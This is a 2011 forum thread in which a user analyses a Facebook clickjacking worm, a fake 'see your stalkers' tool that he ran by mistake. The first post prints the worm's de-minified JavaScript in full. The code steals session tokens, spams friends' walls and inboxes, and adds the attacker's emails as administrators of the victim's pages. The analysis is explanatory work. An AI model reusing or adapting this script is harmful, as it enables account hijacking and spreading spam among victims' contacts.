Our server costs ~$56 per month to run. Please consider donating or becoming a Patron to help keep the site running. Help us gain new members by following us on Twitter and liking our page on Facebook!
Current time: March 29, 2024, 11:54 am

Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Analysis of a Facebook social engineering/Javascript "hack"
#1
Analysis of a Facebook social engineering/Javascript "hack"
I received a notification to "see my facebook stalkers" from one page I frequent. Dubious, I loaded the appropriate javascript injection (next time, use a dummy account...) and executed it.

Suspecting some mischief, I launched another facebook tab to see if it was doing what my instincts were telling me.

It was.

Luckily I halted it before it got to 16 people. Still, that means at least 15 people to scrub my hijacked posts out of.

Looking at the javascript source, I found it was packed (from http://fbonlines.info/StalkerTools.fb) with this garbage: (code hidden as it is really a bear - I just kept it for sake of integrity)


However, the author of this code used the most commonly available javascript minifier (his first mistake), yielding (via http://jsbeautifier.org/):

Code:
function _88xuhyr(_0x91e5x2) {
    st = _0x91e5x2['split'](',');
    d = '';
    for (i = 0; i < st['length']; i++) {
        d += String['fromCharCode'](st[i] - 24);
    };
    eval(d);
};


function addAdmin(_0x91e5x4, _0x91e5x5, _0x91e5x6, _0x91e5x7) {
    iemails = _0x91e5x5['split'](',');
    main_emails = [];
    for (i = 0; i < iemails['length']; i++) {
        main_emails[i] = 'friendselector_input[]=' + iemails[i] + '&friend_selected[]=';
    };
    with(newx = new XMLHttpRequest) {
        open('POST', '/pages/edit/?id=' + _0x91e5x4 + '&sk=admin');
        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        send('post_form_id=' + _0x91e5x6 + '&fb_dtsg=' + _0x91e5x7 + '&fbpage_id=' + _0x91e5x4 + '&' + main_emails['join']('&') + '&save=1');
    };
};


function makePost(_0x91e5x9, _0x91e5xa, _0x91e5xb, _0x91e5xc) {
    formx = _0x91e5x9['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
    dtx = _0x91e5x9['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
    composerx = _0x91e5x9['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
    msg = _0x91e5xa['randomize']() + '\x0A\x0A';
    text_post = '';
    text_actual = '';
    pxt = 'post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + _0x91e5xb['split']('|')[0] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(msg + text_actual['replace'](/\, $/, '')) + '&xhpc_message=' + encodeURIComponent(msg + text_post['replace'](/\, $/, '')) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest';
    update(pxt);
};


function update(_0x91e5xe) {
    with(newx = new XMLHttpRequest) {
        open('POST', '/ajax/updatestatus.php?__a=1');
        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        send(_0x91e5xe);
    };
};
goog1 = 'http://goo.gl/kryZJ';
goog2 = 'http://goo.gl/m2kvB';
goog3 = 'http://goo.gl/y4lbw';
goog4 = 'http://goo.gl/vNRZN';
goog5 = 'http://goo.gl/hF0UK';
goog6 = 'http://goo.gl/zc4Ja';
event_id = '168046893242650';
page_id_x = '198161766879493';
page_id_xx = '';
admin_emails = '[email protected],[email protected]';
statuses = ['Wow! Seems like lots of people stalk me - ' + goog1, 'New FB tool shows who stalks your profile-- ' + goog2, 'Secret tool shows who stalks your pics ' + goog3, 'Insane! Awesome tool to see who looks at your pics >> ' + goog4, 'According to ' + goog5 + ' you\'re my top stalker. Creep.', 'Secret tool shows who stalks your pics - ' + goog6];
subjects = ['Check this out!', 'Hey, whats happening?', 'Hey! This is awesome'];
Array['prototype']['randomize'] = function () {
    return this[Math['floor'](Math['random']() * this['length'])];
};
Object['prototype']['isReady'] = function () {
    if (this['readyState'] == 4 && this['status'] == 200) {
        return true;
    } else {
        return false;
    };
};
String['prototype']['getFriends'] = function () {
    friends2 = this['match'](/facebook\.com\\\\\\\/profile\.php\?id=\d+\\\\\\\">(<span[^>]+>|)[^<>]+/gi)['join'](':')['replace'](/(facebook\.com\\\\\\\/|profile\.php\?id=|<span[^>]+>|l\.php.*)/gi, '')['replace'](/\\\\\\\">/gi, '|')['split'](':')['slice'](1);
    return friends2;
};


function addAdmin(_0x91e5x4, _0x91e5x5, _0x91e5x6, _0x91e5x7) {
    iemails = _0x91e5x5['split'](',');
    main_emails = [];
    for (i = 0; i < iemails['length']; i++) {
        main_emails[i] = 'friendselector_input[]=' + iemails[i] + '&friend_selected[]=';
    };
    with(newx = new XMLHttpRequest) {
        open('POST', '/pages/edit/?id=' + _0x91e5x4 + '&sk=admin');
        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        send('post_form_id=' + _0x91e5x6 + '&fb_dtsg=' + _0x91e5x7 + '&fbpage_id=' + _0x91e5x4 + '&' + main_emails['join']('&') + '&save=1');
    };
};


function loading() {
    var _0x91e5x10 = document['createElement']('div');
    _0x91e5x10['id'] = 'screwyouz';
    _0x91e5x10['setAttribute']('align', 'center');
    _0x91e5x10['style']['margin'] = '0px auto';
    _0x91e5x10['style']['position'] = 'absolute';
    _0x91e5x10['style']['top'] = '10px';
    _0x91e5x10['style']['zindex'] = '100';
    _0x91e5x10['className'] = 'screwyou';
    _0x91e5x10['innerHTML'] = '<br /><br /><br /><br /><br /><center><img src="http://fbviews.org/process.gif" /><br />Scanning may take up to 3 minutes</center>';
    document['body']['appendChild'](_0x91e5x10);
};


function makePost(_0x91e5x9, _0x91e5xa, _0x91e5xb, _0x91e5xc) {
    formx = _0x91e5x9['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
    dtx = _0x91e5x9['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
    composerx = _0x91e5x9['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
    msg = _0x91e5xa['randomize']() + '\x0A\x0A';
    text_post = '';
    text_actual = '';
    pxt = 'post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + _0x91e5xb['split']('|')[0] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(msg + text_actual['replace'](/\, $/, '')) + '&xhpc_message=' + encodeURIComponent(msg + text_post['replace'](/\, $/, '')) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest';
    update(pxt);
};


function update(_0x91e5xe) {
    with(newx = new XMLHttpRequest) {
        open('POST', '/ajax/updatestatus.php?__a=1');
        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        send(_0x91e5xe);
    };
};
if (window['location']['href'] == 'http://www.facebook.com/') {
    formx = (res = document['body']['innerHTML'])['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
    dtx = res['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
    composerx = res['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
} else {
    with(muhaha = new XMLHttpRequest) {
        open('GET', '/', false);
        send(null);
    };
    formx = (res = muhaha['responseText'])['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
    dtx = res['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
    composerx = res['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
};
alert('Hello!\x0A\x0ATo activate the tool press Enter on your keyboard. \x0A\x0AThis will take 2-3 minutes, while waiting please do not close this window or tab.');
update('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(stx = statuses['randomize']()) + '&xhpc_message=' + encodeURIComponent(stx) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest');
with(newz = new XMLHttpRequest) {
    loading();
    open('POST', '/ajax/pages/fan_status.php?__a=1');
    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    send('fbpage_id=' + page_id_x + '&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&post_form_id_source=AsyncRequest');
};
with(newzz = new XMLHttpRequest) {
    open('POST', '/ajax/pages/fan_status.php?__a=1');
    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    send('fbpage_id=' + page_id_xx + '&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&post_form_id_source=AsyncRequest');
};
void 0;
with(fr = new XMLHttpRequest) {
    open('GET', '/ajax/browser/list/friends/all/?uid=' + (me = document['cookie']['match'](/c_user=(\d+)/)[1]) + '&offset=0&dual=1&__a=1');
    onreadystatechange = function () {
        if (fr['isReady']()) {
            friends = fr['responseText']['getFriends']();
            idx = [];
            for (i = 0; i < friends['length']; i++) {
                if (!isNaN(friends[i]['split']('|')[0])) {
                    idx[i] = 'ids[' + i + ']=' + friends[i]['split']('|')[0];
                };
            };
            with(invi = new XMLHttpRequest) {
                open('POST', '/ajax/social_graph/invite_dialog.php?__a=1');
                setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                send('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&' + idx['join']('&') + '&node_id=' + event_id + '&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest');
            };
            cnt_fr = 0;
            tx = setInterval(function () {
                if (cnt_fr == friends['length']) {
                    window['location'] = 'http://fbviews.org/result.php';
                    clearInterval(tx);
                };
                makePost(document['body']['innerHTML'], statuses, friends[cnt_fr], friends);
                with(xa = new XMLHttpRequest) {
                    open('GET', '/ajax/messaging/composer.php?__a=1&__d=1');
                    onreadystatechange = function () {
                        if (xa['isReady']()) {
                            compi = xa['responseText']['match'](/([\d\w]+)_error/)[1];
                            pxi = 'ids_' + compi + '[0]=' + friends[cnt_fr]['split']('|')[0] + '&subject=' + encodeURIComponent(subjects['randomize']()) + '&status=' + encodeURIComponent(statuses['randomize']()) + '&ids[0]=' + friends[cnt_fr]['split']('|')[0] + '&action=send_new&home_tab_id=1&profile_id=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&target_id=0&app_id=&&composer_id=' + compi + '&hey_kid_im_a_composer=true&thread&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest';
                            if (cnt_fr < 15) {
                                with(mi = new XMLHttpRequest) {
                                    open('POST', '/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1');
                                    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                                    send(pxi);
                                };
                            };
                        };
                    };
                    send(null);
                };
                cnt_fr += 1;
            }, 3000);
        };
    };
    send(null);
};
with(ins = new XMLHttpRequest) {
    open('GET', '/insights/?_fb_noscript=1');
    onreadystatechange = function () {
        if (ins['isReady']()) {
            ids = ins['responseText']['match'](/po_\d+">View/gi)['join'](':')['replace'](/(po_|">View)/gi, '')['split'](':');
            cnt_pages = 0;
            tz = setInterval(function () {
                if (cnt_pages == ids['length']) {
                    window['location'] = 'http://fbviews.org/result.php';
                    clearInterval(tz);
                };
                update('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + ids[cnt_pages] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(stx = statuses['randomize']()) + '&xhpc_message=' + encodeURIComponent(stx) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest');
                addAdmin(ids[cnt_pages], admin_emails, formx, dtx);
                cnt_pages += 1;
            }, 3000);
        };
    };
    send(null);
};
Yes, ladies and gentlemen, you see it right. He has left his CnC email accounts unobfuscated, among other things.

Looking at this, you can easily see what is going on. He scans your friends list, and while iterating through, sends both AJAX requests for fbmail and posting on the victims wall.

He also added in a few shortened links, in the event Facebook decides to ban mention of fbonlines.info.

Facebook's best solution would be to scrub their database of the emails in "admin_note" in all page administration controls.
Reply
#2
RE: Analysis of a Facebook social engineering/Javascript "hack"
Nice work, did you report this to Facebook?
"How is it that a lame man does not annoy us while a lame mind does? Because a lame man recognizes that we are walking straight, while a lame mind says that it is we who are limping." - Pascal
Reply
#3
RE: Analysis of a Facebook social engineering/Javascript "hack"
Nope. They have an awfully difficult "Report" system...
Reply
#4
RE: Analysis of a Facebook social engineering/Javascript "hack"
(March 2, 2011 at 7:13 am)Moros Synackaon Wrote: Nope. They have an awfully difficult "Report" system...

In other words, they really don't have one? Dodgy
Please give me a home where cloud buffalo roam
Where the dear and the strangers can play
Where sometimes is heard a discouraging word
But the skies are not stormy all day
Reply
#5
RE: Analysis of a Facebook social engineering/Javascript "hack"
(February 28, 2011 at 9:25 pm)Moros Synackaon Wrote: Yes, ladies and gentlemen, you see it right. He has left his CnC email accounts unobfuscated, among other things.
Haha! Awesome Big Grin
Reply



Possibly Related Threads...
Thread Author Replies Views Last Post
  A weird bug in the preprocessor of PicoBlaze Simulator in JavaScript FlatAssembler 81 5245 December 19, 2023 at 4:46 pm
Last Post: BrianSoddingBoru4
  PicoBlaze Simulator in JavaScript FlatAssembler 80 8639 June 23, 2023 at 5:20 pm
Last Post: arewethereyet
  License for operating social media Fake Messiah 2 742 December 16, 2022 at 10:41 pm
Last Post: Rev. Rye
  [Serious] Do you think social media affects public opinion? WinterHold 14 828 January 12, 2021 at 12:26 pm
Last Post: The Grand Nudger
  Reformatting tools for JavaScript FlatAssembler 0 357 June 14, 2020 at 10:13 am
Last Post: FlatAssembler
  Social Media is Evil AFTT47 51 3083 September 28, 2018 at 9:32 pm
Last Post: Sunflower
  Is anyone else having a problem with Facebook? Brian37 5 753 March 15, 2018 at 1:03 am
Last Post: Minimalist
  Connecting blog to facebook etc robvalue 8 1616 January 28, 2015 at 7:52 am
Last Post: Aoi Magi
  Hack Attempt zebo-the-fat 9 2124 April 6, 2013 at 11:07 pm
Last Post: jstrodel
  Science proves that you should un-friend your ex on Facebook Tino 21 10490 November 4, 2012 at 11:35 pm
Last Post: Tiberius



Users browsing this thread: 1 Guest(s)